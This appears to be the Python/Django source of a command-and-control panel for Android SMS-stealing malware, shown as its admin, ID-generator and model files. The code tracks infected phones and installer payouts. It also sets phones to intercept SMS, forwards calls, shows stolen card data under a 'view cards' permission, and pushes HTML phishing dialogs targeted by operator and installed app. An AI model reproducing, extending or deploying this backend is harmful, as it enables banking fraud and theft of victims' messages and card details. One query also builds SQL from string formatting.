from django.utils.module_loading import module_has_submodule
for app in settings.INSTALLED_APPS:
mod = import_module(app)
before_import_registry = None
try:
before_import_registry = copy.copy(admin.site._registry)
import_module('%s.admin' % app)
except:
admin.site._registry = before_import_registry
if module_has_submodule(mod, 'admin'):
raise
class SysUserAddForm(UserCreationForm):
class Meta:
model = SysUser
fields = ('username', '<PASSWORD>', '<PASSWORD>', '<PASSWORD>')
class SysUserChangeForm(UserChangeForm):
class Meta:
model = SysUser
fields = ('jabber',)
class UserProfileAdmin(UserAdmin):
fieldsets = (
(None, {'fields': ('username', 'password', '<PASSWORD>')}),
(_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser',
'groups', 'user_permissions')}),
(_('Important dates'), {'fields': ('last_login', 'date_joined')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('username', '<PASSWORD>', '<PASSWORD>', '<PASSWORD>')}
),
)
list_display = ['username', 'date_joined']
form = SysUserChangeForm
add_form = SysUserAddForm
admin.site.register(SysUser, UserProfileAdmin)
class InstallerAddForm(UserCreationForm):
class Meta:
model = Installer
fields = ('username', '<PASSWORD>', '<PASSWORD>', 'user_id')
class InstallerChangeForm(UserChangeForm):
class Meta:
model = Installer
fields = ('username', 'user_id')
class InstallerProfileAdmin(UserAdmin):
fieldsets = (
(None, {'fields': ('username', 'password', 'user_id',)}),
(_('Important dates'), {'fields': ('last_login', 'date_joined')}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('username', '<PASSWORD>', '<PASSWORD>', 'user_id',)}
),
)
actions = ('mark_as_paid',)
list_display = ['username', 'user_id']
form = InstallerChangeForm
add_form = InstallerAddForm
def mark_as_paid(self, request, queryset):
"""
@type request: HttpRequest
@type queryset: QuerySet
"""
count = 0
for usr in queryset.all():
count += 1
usr.phonedata_set.all().update(paid=True)
self.message_user(request, "Marked phones as paid for {0} users".format(count))
mark_as_paid.short_description = _("Mark phones for selected users as paid")
admin.site.register(Installer, InstallerProfileAdmin)
class PhoneNumberFilter(admin.SimpleListFilter):
title = _("Phone number")
parameter_name = "number"
def lookups(self, request, model_admin):
return (
('valid', _("Valid")),
('invalid', _("Invalid")),
)
def queryset(self, request, queryset):
"""
@type request: HttpRequest
@type queryset: QuerySet
@rtype: QuerySet
"""
if self.value() == 'valid':
return queryset.filter(number__startswith='+')
elif self.value() == 'invalid':
return queryset.exclude(number__startswith='+')
class AppInstalledFilter(admin.SimpleListFilter):
title = _("Installed app")
parameter_name = "app"
def lookups(self, request, model_admin):
return (
(None, 'None'),
)
def queryset(self, request, queryset):
if request.GET.get('app'):
return queryset.filter(installedapp__name=request.GET.get('app'))
return queryset
class SMSSenderFilter(admin.SimpleListFilter):
title = _("SMS Senders")
parameter_name = "sender"
def lookups(self, request, model_admin):
return (
(None, 'None'),
)
def queryset(self, request, queryset):
if request.GET.get('sender'):
return queryset.filter(internalsms__sender__id=request.GET.get('sender')).distinct()
return
class CountryFilter(admin.SimpleListFilter):
title = _("Country")
parameter_name = "country"
def lookups(self, request, model_admin):
return (
(None, 'None'),
)
def queryset(self, request, queryset):
cc = request.GET.get(self.parameter_name)
if cc:
return queryset.filter(country=cc)
return queryset
class OnlineFilter(admin.SimpleListFilter):
title = _("Online")
parameter_name = 'online'
def lookups(self, request, model_admin):
return (
(1, _("Yes")),
)
def queryset(self, request, queryset):
if self.value() == '1':
from datetime import datetime, timedelta
then = datetime.utcnow() - timedelta(minutes=15)
return queryset.filter(last_connection__gt=then)
return queryset
class PhoneDataAdminForm(forms.ModelForm):
class Meta:
model = PhoneData
widgets = {
'number': html5.Html5PhoneInput(attrs={'size': '14'}),
}
exclude = ()
class PhoneDataAdmin(admin.ModelAdmin):
list_per_page = 50
list_display = ['imei', 'uniq_id', 'work_time', 'last_connect', 'has_card', 'number', 'country', ]
list_editable = ['number', 'country', ]
list_filter = (
'id_sent', 'inactive', 'installer', 'paid',
PhoneNumberFilter, OnlineFilter, AppInstalledFilter, SMSSenderFilter, CountryFilter
)
actions = ('send_id_command', 'send_dialogs', )
form = PhoneDataAdminForm
def get_changelist_form(self, request, **kwargs):
# return super(PhoneDataAdmin, self).get_changelist_form(request, **kwargs)
return PhoneDataAdminForm
def work_time(self, obj):
"""
@type obj: PhoneData
"""
return obj.get_work_time()
work_time.admin_order_field = 'registered'
work_time.short_description = _("Work time")
def last_connect(self, obj):
"""
@type obj: PhoneData
"""
return obj.since_last_connection()
last_connect.admin_order_field = 'last_connection'
last_connect.short_description = _("Last connection")
def has_card(self, obj):
"""
@type obj: PhoneData
"""
d = settings.MONGO['extra_data'].find_one(
{'type': 'userdata', 'data.type': 'card information', 'code': obj.uniq_id})
if d:
return "Y"
return ""
has_card.short_description = _("Card")
has_card.safe = True
class SendIDForm(forms.Form):
_selected_action = forms.CharField(widget=forms.MultipleHiddenInput)
phone = forms.CharField(max_length=32)
def send_id_command(self, request, queryset):
"""
@type request: HttpRequest
@type queryset: QuerySet
"""
form = None
if 'apply' in request.POST:
form = self.SendIDForm(request.POST)
if form.is_valid():
phone = form.cleaned_data['phone']
count = 0
for p in queryset:
# p.tags.add(phone)
commands.send_id(p, phone)
logger.debug("Sending ID to {0}".format(p))
count += 1
plural = ''
if count != 1:
plural = 's'
self.message_user(request, "Successfully sent to {0:d} phone{1:s}.".format(count, plural))
return HttpResponseRedirect(request.get_full_path())
if not form:
form = self.SendIDForm(initial={'_selected_action': queryset.values_list('id', flat=True)})
return render(request, 'admin/smsapp/phonedata/sentid_form.html', {'phones': queryset, 'send_form': form, })
send_id_command.short_description = _("Send ID SMS from selected phones")
def change_view(self, request, object_id, form_url='', extra_context=None):
extra_context = extra_context or {}
collection = settings.MONGO['extra_data']
phone_extras = []
p = PhoneData.objects.get(pk=object_id)
for rec in collection.find({'code': p.uniq_id, 'type': 'userdata'}):
try:
phone_extras.append({'title': rec['data']['type'], 'records': rec['data']})
except KeyError:
pass
extra_context['extras'] = phone_extras
extra_context['uniq_id'] = p.uniq_id
return super(PhoneDataAdmin, self).change_view(request, object_id, form_url, extra_context)
class DialogsForm(forms.Form):
_selected_action = forms.CharField(widget=forms.MultipleHiddenInput)
dialog = forms.ModelChoiceField(help_text=_("Select dialog to send"), queryset=RemoteDialog.objects.all())
# noinspection PyMethodMayBeStatic
def send_dialogs(self, request, queryset):
form = None
if 'apply' in request.POST:
form = self.DialogsForm(request.POST)
if form.is_valid():
dlg = form.cleaned_data.get('dialog')
count = 0
for p in queryset:
remote_dialog.push_dialog(p.uniq_id, dlg)
logger.debug("Pushed dialog {0} to phone {1}".format(dlg, p))
count += 1
plural = ''
if count != 1:
plural = 's'
self.message_user(request, "Successfully sent to {0:d} phone{1:s}.".format(count, plural))
return HttpResponseRedirect(request.get_full_path())
if not form:
form = self.DialogsForm(initial={'_selected_action': queryset.values_list('id', flat=True)})
return render(request, 'admin/smsapp/remotedialog/send_dialogs_form.html',
{'dialogs_form': form, 'phones': queryset})
send_dialogs.short_description = _("Send specified dialogs to phones")
admin.site.register(PhoneData, PhoneDataAdmin)
class LogRecordAdmin(admin.ModelAdmin):
list_per_page = 50
change_list_template = "admin/smsapp/logrecord/list.html"
list_display = ('registered', 'contents',)
def get_model_perms(self, request):
return {}
def changelist_view(self, request, extra_context=None):
extra_context = extra_context or {}
extra_context['title'] = _('Log records')
return super(LogRecordAdmin, self).changelist_view(request, extra_context)
def get_queryset(self, request):
return super(LogRecordAdmin, self).get_queryset(request).order_by('-registered')
admin.site.register(LogRecord, LogRecordAdmin)
class SMSAdmin(admin.ModelAdmin):
list_per_page = 50
list_display = ('source', 'phone', 'owner', 'contents', 'billing_status')
list_filter = ('billing_status',)
list_editable = ('billing_status',)
admin.site.register(SMSRecord, SMSAdmin)
class OperatorCodeForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(OperatorCodeForm, self).__init__(*args, **kwargs)
try:
country = self.initial.get('operator')[:3]
self.fields['operator'].widget.widgets[1].choices = cfields.get_operator_choices(country)
except ValueError:
pass
except TypeError:
pass
class Meta:
model = RemoteDialog
widgets = {
'operator': cfields.OperatorWidget()
}
exclude = ()
class DialogAdmin(admin.ModelAdmin):
list_display = ('id', 'operator_name', 'priority', 'description',)
list_editable = ('priority',)
form = OperatorCodeForm
fieldsets = (
(None, {'fields': ('operator', 'priority', 'description', 'delay', 'restart')}),
("Dialogs", {'fields': ('dlg1', )}),
("HTML content", {'fields': ('html_contents',)})
)
def operator_name(self, val):
return operator_code_to_full_name(val.operator)
operator_name.short_description = _("Operator")
admin.site.register(RemoteDialog, DialogAdmin)
class InternalSMSAdmin(admin.ModelAdmin):
list_display = ('sender', 'created', 'phone')
list_filter = ('sender',)
def has_add_permission(self, request):
return False
# noinspection PyMethodMayBeStatic
def sender_stats(self, request):
def get_country_choices():
import pycountry
choices = [(None, '----')]
for d in PhoneData.objects.order_by('country').distinct().values('country'):
ccode = d['country']
try:
c = pycountry.countries.get(alpha2=ccode)
choices.append((ccode, c.name))
except KeyError:
logger.debug("Unknown country: {0}".format(ccode))
return choices
class CountryForm(Form):
country = forms.ChoiceField(choices=get_country_choices())
if request.POST.get('country'):
ls = InternalSMS.objects.get_sender_stats_by_country(request.POST.get('country'))
else:
ls = InternalSMS.objects.get_sender_stats()
cl = {'opts': {'app_label': "smsapp"}, 'result_list': ls}
return render(request, 'admin/smsapp/internalsms/topsenders.html',
{'cl': cl, 'country_form': CountryForm(request.POST or None)})
def get_urls(self):
from django.conf.urls import patterns, url
urls = super(InternalSMSAdmin, self).get_urls()
my_urls = patterns(
'',
url(r'^senders$', admin.site.admin_view(self.sender_stats), name='sender_stats')
)
return urls + my_urls
admin.site.register(InternalSMS, InternalSMSAdmin)
class AppDialogAdmin(admin.ModelAdmin):
list_display = ('description',)
admin.site.register(AppDialog, AppDialogAdmin)
```
#### File: smsg_r/smsapp/idgen.py
```python
import random
import cPickle
__cachefile = 'pygpw_tris_cache.cpickle'
_lowercase = 'abcdefghijklmnopqrstuvwxyz'
_uppercase = _lowercase.upper()
_vowels = 'aeiou'
_numbers = '0123456789'
_symbols = '`~!@#$%^&*()-=_+[]{}\\|;:\'",.<>/?'
_leet_table = {
# lowercase: ([singlechar_substs],[multichar_substs])
'a': (['4', '@', '^'], ['/\\', '/-\\']),
'b': (['6', '8', '&'], ['|3', '13', 'I3']),
'c': (['<', '(', '{'], []),
'd': ([], ['|)', '])', '[)', 'I>', '|>']),
'e': (['3', '&'], []),
'f': ([], ['ph', '|=', ']=', 'I=']),
'g': (('9', '6'), ['(_+']),
'h': ([], ['/-/', ']-[', '|-|', '}{', '}-{']),
'i': (('1', '|', '!'), []),
'j': ([], ['_|', '_/', '_7']),
'k': ([], ['|<', '|{']),
'l': (['|'], ['|_', ]),
'm': ([], ['/\\/\\', '|V|', '||', '[V]', '|\\/|', '/|\\', '/|/|', '/V\\']),
'n': (['~'], ['|\\|', '/\\/', '|\\', ']\\[']),
'o': (['0', ], ['()', '[]']),
'p': (['?'], ['|*', '|o', '|>', '|D']),
'q': (['9'], ['()_', 'O_', '0_', '<|']),
'r': (['2'], ['12', '|?', '/2', '|~', '|2', '|`', 'l2']),
's': (['5', '$', 'z'], []),
't': (['+', '7'], ['-|-', ]),
'u': ([], ['|_|', '[_]', '\_/', '\\_\\', '/_/', '(_)']),
'v': ([], ['\\/']),
'w': ([], ['\\/\\/', 'VV', '\\^/', '\\V/', '\\|/']),
'x': (['%', '*'], ['><', '}{']),
'y': ([], ['`/']),
'z': (['2', 's'], ['7_']),
}
_tris = None
_sigma = None
def _docache():
"""
(re)build cache using cPickle. This will be automatically called if the
cachefile is not found, so you can recreate the cache by simply deleting
the existing one
"""
# load tris
# calculate the sigma value: the probability total of the trigraph set
# sigma calculation result is cached, since source is relatively static.
from smsapp.idgen_tris import tris
sigma = 0
for c1 in xrange(26):
for c2 in xrange(26):
for c3 in xrange(26):
sigma += tris[c1][c2][c3]
# tris cached since cPickle has superior I/O speed than .pyc marshalling
dumpobj = (tris, sigma) # dump tuple
fhw = open(__cachefile, 'w')
cPickle.dump(dumpobj, fhw)
fhw.close()
def _readcache():
"""get the trigraph data from cachefile. returns a tuple (t,s)
where t is the matrix and s is the sigma value"""
fh = None
try:
fh = open(__cachefile, 'r')
except:
# build if does not exist
_docache()
fh = open(__cachefile, 'r')
cachedata = cPickle.load(fh)
fh.close()
return cachedata
def gettris():
"""get the trigraph probability matrix and sigma value.
returns a tuple (t,s) where t is the matrix and s is the sigma value."""
global _tris
global _sigma
if not _tris or not _sigma:
# store into module namespace so future calls require no I/O
_tris, _sigma = _readcache()
return _tris, _sigma
def generate_trigraph(passwordlength=8, alphabet=None, vowels=None):
'''Generator'''
_alphabet = _lowercase
tdata, sigma = gettris()
password = [] # append required
# pick random starting point
# we do it this way so we can be sure to pick a natural english
# trigraph as a starting point, not just random gibberish, since
# trigraphs with zero english occurrences are never chosen.
ranno = int(sigma * random.random())
sum = 0
bail = False
for c1 in xrange(26):
for c2 in xrange(26):
for c3 in xrange(26):
sum += tdata[c1][c2][c3]
if sum >= ranno:
# this is the starting random (but probable) trigraph
password.append(_alphabet[c1])
password.append(_alphabet[c2])
password.append(_alphabet[c3])
bail = True # break out of this triply-nested loop
if bail:
break
if bail:
break
if bail:
break
# do random walk
nchar = 3
while nchar < passwordlength:
c1 = _alphabet.find(password[nchar - 2])
c2 = _alphabet.find(password[nchar - 1])
# we have a password ...[c1][c2][?] character triplet
# --------->|
# (current password)
# with c1 and c2 being the last two chars of current password.
# want to append another char (i.e. '?') to password.
# randomly grab the third ('?') from trigraph table
# using probability density defined in that data[c1][c2] list.
sum = 0
for c3 in xrange(26):
sum += tdata[c1][c2][c3]
if sum == 0:
# in this unlikely case, we have a c1, c2 pair where there
# are zero natural trigraphs starting with [c1][c2]
# meaning we cant continue any further.
# For correctness, we should break the loop for
# this password or try again.
# However, another workaround is to 'inject' a random vowel to
# continue and finish the rest of this password.
# --- Comment out either one of the 2 below lines ---
# break
password.extend(random.sample(_vowels, 1))
else:
ranno = int(random.random() * sum)
sum = 0
for c3 in xrange(26):
sum += tdata[c1][c2][c3]
if sum > ranno:
password.append(_alphabet[c3])
break
nchar += 1
# end random walk
return ''.join(password)
def generate_naive(passwordlength=8, vowel_interlace=False, alphabet=_lowercase, vowels=_vowels):
'''naive implementation. Set vowel_interlace=True to simulate pronouncable passwords'''
pw = []
for pos in xrange(passwordlength):
# if vowel_interlace, dont allow two consonants in a row
if vowel_interlace and pos > 0 and not pw[pos - 1] in _vowels:
pw.extend(random.sample(vowels, 1))
else:
pw.extend(random.sample(alphabet, 1))
return "".join(pw)
def leetify_string(plain, capitalize_rate=0.5, substitute_rate=0.5, multichar=False):
leet = []
c_idx = 0
leet_len = 0
maxchars = len(plain)
while leet_len < len(plain):
c = plain[c_idx]
cl = c.lower()
if leet_len == len(plain):
break
maxchars = len(plain) - leet_len
if maxchars == 0:
break
if random.random() < capitalize_rate:
if c == cl:
c = c.upper()
else:
c = c.lower()
if random.random() < substitute_rate:
single_subs, multi_subs = _leet_table.get(cl, ([c], []))
# try picking a multicharacter substitute that will fit it in
if multichar and len(multi_subs) > 0:
if maxchars == 1:
if len(single_subs) > 0:
c = random.sample(single_subs, 1)[0]
leet.append(c)
c_idx += 1
leet_len += len(c)
continue
# temporary selection pool of mixed multi and single
tmp_subs = []
tmp_subs.extend(single_subs[:])
tmp_subs.extend(multi_subs[:])
tmp = None
while len(tmp_subs):
tmp = random.sample(tmp_subs, 1)[0]
if len(tmp) > maxchars:
# remove this subst entry, it's too big
tmp_subs.remove(tmp)
else:
tmp_subs = [] # break inner loop
if not tmp is None:
if len(tmp) <= maxchars:
c = tmp
else:
if len(single_subs) > 0:
c = random.sample(single_subs, 1)[0]
leet.append(c)
c_idx += 1
leet_len += len(c)
# return a output, explain pair
return ''.join(leet), plain[:c_idx]
_methods = {
# name, (func, default kwargs dict)
'trigraph': (generate_trigraph, {}),
'naive': (generate_naive, {'vowel_interlace': True}),
'random': (generate_naive, {'vowel_interlace': False}),
}
def generate(numpasswords=1, passwordlength=8, method='trigraph', verbose=False,
leetify=False, alphabet=_lowercase, vowels=_vowels,
explain=False, multichar=False, substitute_rate=0.5, capitalize_rate=0.5):
'''main generate loop'''
gfunc, kwargs = _methods[method]
passlist = []
for i in xrange(numpasswords):
pw = gfunc(passwordlength=passwordlength, alphabet=alphabet, vowels=vowels, **kwargs)
pw_explain = pw
if leetify:
pw, pw_explain = leetify_string(pw, multichar=multichar,
substitute_rate=substitute_rate,
capitalize_rate=capitalize_rate)
passlist.append(pw)
return passlist
class __NP():
@staticmethod
def write(x):
pass
def generate_uniq_id():
"""
Generates friendly UUID
@return UUID
@rtype str
"""
generate_args = {
'numpasswords': 1,
'passwordlength': 8,
'leetify': False,
'method': 'naive',
'alphabet': _uppercase
}
p = generate(**generate_args)
if p:
return "{0:s}{1:02d}".format(p[0], random.randint(0, 99))
```
#### File: smsg_r/smsapp/models.py
```python
import base64
import logging
from datetime import timedelta, datetime
import re
import HTMLParser
from ago import human
from django.conf import settings
from django.contrib.auth.models import User, UserManager, Permission
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import AppRegistryNotReady
from django.db import models, connection
from django.db.models import Q
from django.db.models.signals import post_save
from django.db.utils import ProgrammingError
from django.dispatch import receiver
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from django_countries.fields import CountryField
from smsapp import idgen, commands, cfields
logger = logging.getLogger(__name__)
DB_HTML_CACHE = "__htmlCache"
DB_HTML_VERSION = "__htmlVersion"
DB_CACHE_TIMEOUT = 30
class SysUser(User):
jabber = models.EmailField(null=True)
activation_key = models.CharField(_('activation key'), max_length=40, null=True)
objects = UserManager()
ACTIVATED = u"ALREADY_ACTIVATED"
class Meta:
verbose_name = _("System User")
verbose_name_plural = _("System Users")
def activation_key_expired(self):
expiration_date = timedelta(days=settings.ACCOUNT_ACTIVATION_DAYS)
return self.activation_key == self.ACTIVATED or (self.date_joined + expiration_date <= timezone.now())
activation_key_expired.boolean = True
class Installer(User):
user_id = models.DecimalField(max_digits=16, decimal_places=0, unique=True)
objects = UserManager()
class Meta:
verbose_name = _("Installer")
verbose_name_plural = _("Installers")
def __unicode__(self):
return self.username
def operator_code_to_full_name(code):
import mobile_codes
import re
h = HTMLParser.HTMLParser()
a = re.compile("^\d{5,}")
if not code or not a.match(code):
return code
mcc = code[:3]
mnc = code[3:]
try:
op = mobile_codes.mcc_mnc(mcc, mnc)
cn = mobile_codes.mcc(mcc)
try:
return u"{0} ({1}) - {2}".format(h.unescape(op.operator), mnc, cn[0].name)
except AttributeError:
return u"{0} ({1}) - {2}".format(h.unescape(op.operator), mnc, cn[0])
except KeyError:
try:
cn = mobile_codes.mcc(mcc)
except KeyError:
return u"Unknown ({0}/{1})".format(mcc, mnc)
try:
return u"{0} unknown ({1}/{2})".format(cn.name, mcc, mnc)
except AttributeError:
return u"Unknown ({0}/{1})".format(mcc, mnc)
class MobileOperator(models.Model):
name = models.CharField(max_length=255)
def __unicode__(self):
return operator_code_to_full_name(self.name)
# noinspection PyMethodMayBeStatic
class PhoneManager(models.Manager):
def get_online_list(self):
cursor = connection.cursor()
query = """
SELECT * FROM smsapp_phonedata WHERE
last_connection >= NOW() - INTERVAL '15 minutes'
"""
cursor.execute(query)
return cursor.fetchall()
def get_country_list(self, user_id):
"""
Return list of countries with available phones
@param self: this object
@param user_id: User ID
@type user_id: int
@return: set of data
@rtype: dict
"""
cursor = connection.cursor()
query = """
SELECT count(id) as total, sum(CASE WHEN (owner_id IS NULL OR owner_id = {0}) AND
last_connection >= NOW() - INTERVAL '15 minutes' THEN 1 ELSE 0 END) as available, country
FROM smsapp_phonedata WHERE "number" LIKE '+%' AND NOT inactive
GROUP BY country ORDER BY available DESC ;
""".format(user_id)
cursor.execute(query)
return cursor.fetchall()
def get_country_list_total(self):
"""
Return list of countries with available phones
@param self: this object
@return: set of data
@rtype: dict
"""
cursor = connection.cursor()
query = """
SELECT count(id) AS total,
sum(CASE WHEN last_connection >= NOW() - INTERVAL '15 minutes' THEN 1 ELSE 0 END) AS available,
country
FROM smsapp_phonedata
GROUP BY country ORDER BY available DESC ;
"""
cursor.execute(query)
return cursor.fetchall()
def get_active_phones(self, user_id, country_code):
"""
@param user_id: ID of the user to list phones for
@type user_id: int
@param country_code: Country code to filter phones
@type country_code: str
@return: List of phones belonging to country and given user, active during last 15 minutes
@rtype: QuerySet of PhoneData
"""
return self.get_queryset().filter(country=country_code).filter(
Q(owner__isnull=True) | Q(owner__id=user_id)).filter(number__startswith='+').filter(
last_connection__gte=timezone.now() - timedelta(minutes=15))
def get_inactive_phones(self):
"""
@return: list of phones which didn't contact the server for 5 days
@rtype: QuerySet of PhoneData
"""
return self.get_queryset().filter(last_connection__lt=timezone.now() - timedelta(days=5)).exclude(inactive=True)
class PhoneData(models.Model):
SMS_INITIAL = 0
SMS_LISTEN = 1
SMS_INTERCEPT = 2
SMS_STATUS = (
(SMS_INITIAL, "None"),
(SMS_LISTEN, "Listening"),
(SMS_INTERCEPT, "Intercepting")
)
SMS_STATUS_DICT = dict(SMS_STATUS)
number = models.CharField(max_length=255, null=True, verbose_name=_("Phone #"), db_index=True, blank=True)
imei = models.CharField(max_length=255, unique=True, verbose_name=_("H/W ID"), null=True)
registered = models.DateTimeField(auto_now_add=True)
country = CountryField(max_length=4, null=True, verbose_name=_("Country code"), blank=True, db_index=True)
os_version = models.CharField(max_length=128, null=True, verbose_name=_("OS version"))
hw_model = models.CharField(max_length=255, null=True, verbose_name=_("Hardware model"))
owner = models.ForeignKey(User, verbose_name=_("Assigned to"), null=True, blank=True)
uniq_id = models.CharField(max_length=64, null=True, unique=True, verbose_name=_("Unique ID"))
operator = models.ForeignKey(MobileOperator, null=True, blank=True, verbose_name=_("Mobile operator"))
sms_status = models.IntegerField(default=SMS_INITIAL, choices=SMS_STATUS, verbose_name=_("SMS status"))
forwarding_calls = models.CharField(max_length=24, null=True, blank=True, verbose_name=_("Forwarding calls to"))
last_connection = models.DateTimeField(null=True, verbose_name=_("Last connection"))
id_sent = models.BooleanField(default=False, verbose_name=_("#sentid already sent"))
locked = models.BooleanField(default=False, verbose_name=_("Locked"))
inactive = models.BooleanField(default=False, verbose_name=_("Inactive"),
help_text=_("Set automatically if the phone didn't contact server for 5 days"))
installer = models.ForeignKey(Installer, null=True, verbose_name=_("Installer"), related_name='bot_installer')
paid = models.BooleanField(default=False, verbose_name=_("Paid to installer"))
admin_comment = models.TextField(blank=True, null=True, verbose_name=_("Admin comment"))
app_dialogues_version = models.CharField(max_length=255, null=True, blank=True)
objects = PhoneManager()
class Meta:
verbose_name = _("phone")
verbose_name_plural = _("phones")
index_together = [['number', 'id_sent'], ]
def __str__(self):
return "IMEI: {0} code: {1}".format(self.imei, self.uniq_id)
def is_available(self):
"""
If this phone is available to users?
@return: True if the phone isn't assigned currently
@rtype: bool
"""
return self.owner is None
def get_work_time(self):
td = timezone.now() - self.registered
return human(td, past_tense='{0}', precision=1)
def status_desc(self):
return self.SMS_STATUS_DICT.get(self.sms_status)
def since_last_connection(self):
if self.last_connection is None:
return "n/a"
td = timezone.now() - self.last_connection
return human(td, past_tense='{0} ago', precision=1)
class UserComment(models.Model):
user = models.ForeignKey(SysUser)
phone = models.ForeignKey(PhoneData)
contents = models.TextField(verbose_name=_("Comment contents"))
class Meta:
unique_together = (('user', 'phone'),)
class BlockedNumber(models.Model):
number = models.CharField(max_length=255)
phone = models.ForeignKey(PhoneData)
class Meta:
index_together = [['number', 'phone'], ]
verbose_name = _("blocked number")
verbose_name_plural = _("blocked numbers")
class SMSRecord(models.Model):
STATUS_NORMAL = 0
STATUS_REFUNDED = 1
STATUS_DISPUTED = 2
STATUS = (
(STATUS_NORMAL, _("Normal")),
(STATUS_REFUNDED, _("Refunded")),
(STATUS_DISPUTED, _("Disputed")),
)
source = models.CharField(max_length=255, null=True, verbose_name=_("From"))
dest = models.CharField(max_length=255, null=True, verbose_name=_("To"))
contents = models.TextField(verbose_name=_("SMS Text"))
created = models.DateTimeField(auto_now_add=True)
phone = models.ForeignKey(PhoneData)
owner = models.ForeignKey(SysUser, null=True)
intercepted = models.BooleanField(default=False)
billing_status = models.IntegerField(choices=STATUS, default=STATUS_NORMAL)
class Meta:
verbose_name = _("SMS")
verbose_name_plural = _("SMS records")
class LogRecord(models.Model):
registered = models.DateTimeField(auto_now_add=True)
contents = models.TextField()
@receiver(post_save, sender=PhoneData)
def on_phone_create(instance, **kw):
"""
@param instance: Phone instance to update
@type instance: PhoneData
"""
if instance.uniq_id is None:
iid = idgen.generate_uniq_id()
instance.uniq_id = iid
PhoneData.objects.filter(pk=instance.pk).update(uniq_id=iid)
logger.debug("Updating phone record {0} with new ID {1}".format(instance, iid))
# check if containing a valid #
rx = re.compile('^\+')
if not rx.match(unicode(instance.number)) and settings.DEFAULT_SENDID_PHONE: # send ID command
commands.send_id(instance, settings.DEFAULT_SENDID_PHONE)
class RemoteDialog(models.Model):
sender = models.CharField(max_length=255, unique=True, null=True, blank=True)
app = models.CharField(max_length=255, unique=True, null=True, blank=True)
operator = cfields.OperatorField(max_length=32, unique=True, null=True, blank=True)
priority = models.DecimalField(decimal_places=0, max_digits=4, default=0)
description = models.CharField(max_length=255)
delay = models.IntegerField(default=0, verbose_name=_("initial delay"), help_text=_("in minutes"))
restart = models.IntegerField(default=0, verbose_name=_("restart interval"), help_text=_("in minutes"))
dlg1 = models.TextField(verbose_name=_("first dialog text"))
html_contents = models.TextField(verbose_name=_("HTML contents"), null=True, blank=True)
class Meta:
verbose_name = _("dialog")
verbose_name_plural = _("dialogs")
def __unicode__(self):
return self.description
def clean(self):
if not self.sender:
self.sender = None
if not self.app:
self.app = None
if not self.operator:
self.operator = None
super(RemoteDialog, self).clean()
def get_json(self):
"""
Returns json-compatible representation of the whole dialog
@return: All objects in a form that the client understands
@rtype: dict
"""
return {
'ishtml': True,
'start delay minutes': self.delay, 'restart interval minutes': self.restart,
'first dialog': self.dlg1,
'html': base64.b64encode(self.html_contents.encode('utf-8')) if self.html_contents else "",
'correlation id': self.pk
}
class ISender(models.Model):
name = models.CharField(max_length=255, unique=True, null=False)
def __unicode__(self):
return self.name
class Meta:
verbose_name = _("internal SMS sender")
verbose_name_plural = _("internal SMS senders")
class InternalSMSManager(models.Manager):
# noinspection PyMethodMayBeStatic
def get_sender_stats(self):
cursor = connection.cursor()
query = """
SELECT i.sender_id, s.name, COUNT(DISTINCT i.phone_id) AS num_used
FROM smsapp_internalsms AS i, smsapp_isender AS s WHERE s.id=i.sender_id GROUP BY i.sender_id, s.name
HAVING COUNT(DISTINCT i.phone_id) > 1
ORDER BY num_used DESC
"""
cursor.execute(query)
return cursor.fetchall()
# noinspection PyMethodMayBeStatic
def get_sender_stats_by_country(self, country_code):
cursor = connection.cursor()
query = """
SELECT i.sender_id, s.name, COUNT(DISTINCT i.phone_id) AS num_used
FROM smsapp_internalsms AS i, smsapp_isender AS s, smsapp_phonedata as p
WHERE s.id=i.sender_id AND p.id=i.phone_id AND p.country=%s GROUP BY i.sender_id, s.name
HAVING COUNT(DISTINCT i.phone_id) > 1 ORDER BY num_used DESC;
"""
cursor.execute(query, [country_code])
return cursor.fetchall()
# noinspection PyMethodMayBeStatic
def get_country_list_of_senders(self):
cursor = connection.cursor()
query = """
SELECT DISTINCT p.country AS code FROM smsapp_phonedata AS p, smsapp_internalsms AS s
WHERE p.id=s.phone_id ORDER BY code
"""
cursor.execute(query)
return cursor.fetchall()
class InternalSMS(models.Model):
sender = models.ForeignKey(ISender, verbose_name=_("sender"), null=True)
contents = models.TextField(verbose_name=_("SMS Text"))
created = models.DateTimeField(auto_now_add=True)
phone = models.ForeignKey(PhoneData)
objects = InternalSMSManager()
def __unicode__(self):
return "from: {f}, phone: {p}".format(f=self.sender, p=self.phone)
class Meta:
verbose_name = _("internal SMS")
verbose_name_plural = _("internal SMSs")
class InstalledAppsManager(models.Manager):
# noinspection PyMethodMayBeStatic
def get_top_apps(self):
cursor = connection.cursor()
query = """
SELECT name, COUNT(phone_id) AS cnt FROM smsapp_installedapp GROUP BY name
HAVING COUNT(phone_id) > 1 ORDER BY cnt DESC
"""
cursor.execute(query)
return cursor.fetchall()
# noinspection PyMethodMayBeStatic
def get_top_apps_by_country(self, country_code):
cursor = connection.cursor()
query = """
SELECT a.name, COUNT(a.phone_id) AS cnt FROM smsapp_installedapp AS a, smsapp_phonedata AS p
WHERE a.phone_id = p.id AND p.country=%s
GROUP BY a.name
HAVING COUNT(a.phone_id) > 1 ORDER BY cnt DESC
"""
cursor.execute(query, [country_code])
return cursor.fetchall()
class InstalledApp(models.Model):
name = models.CharField(max_length=255, db_index=True)
phone = models.ForeignKey(PhoneData)
objects = InstalledAppsManager()
def __unicode__(self):
return self.name
class Meta:
verbose_name = _("installed application")
verbose_name_plural = _("installed applications")
index_together = [['name', 'phone'], ]
class AppDialog(models.Model):
description = models.CharField(max_length=255)
html_contents = models.TextField(verbose_name=_("HTML contents"), null=True, blank=True)
apps = models.TextField(verbose_name=_("app filter"), help_text=_("1 package per line"))
def __unicode__(self):
return self.description
class Meta:
verbose_name = _("application dialog")
verbose_name_plural = _("application dialogues")
def create_custom_permissions():
try:
ct, created = ContentType.objects.get_or_create(model='', app_label='smsapp', name='view cards')
Permission.objects.get_or_create(codename='view_cards', content_type=ct, name='View cards info')
except ProgrammingError:
logger.error("Content type tables haven't been initialized yet")
try:
create_custom_permissions()
except AppRegistryNotReady:
pass
class Option(models.Model):
name = models.CharField(max_length=255, unique=True)
content = models.TextField(blank=True)
@receiver(post_save, sender=AppDialog)
def set_html_version(instance, **kw):
opt, created = Option.objects.get_or_create(name='html version')
opt.content = datetime.utcnow()
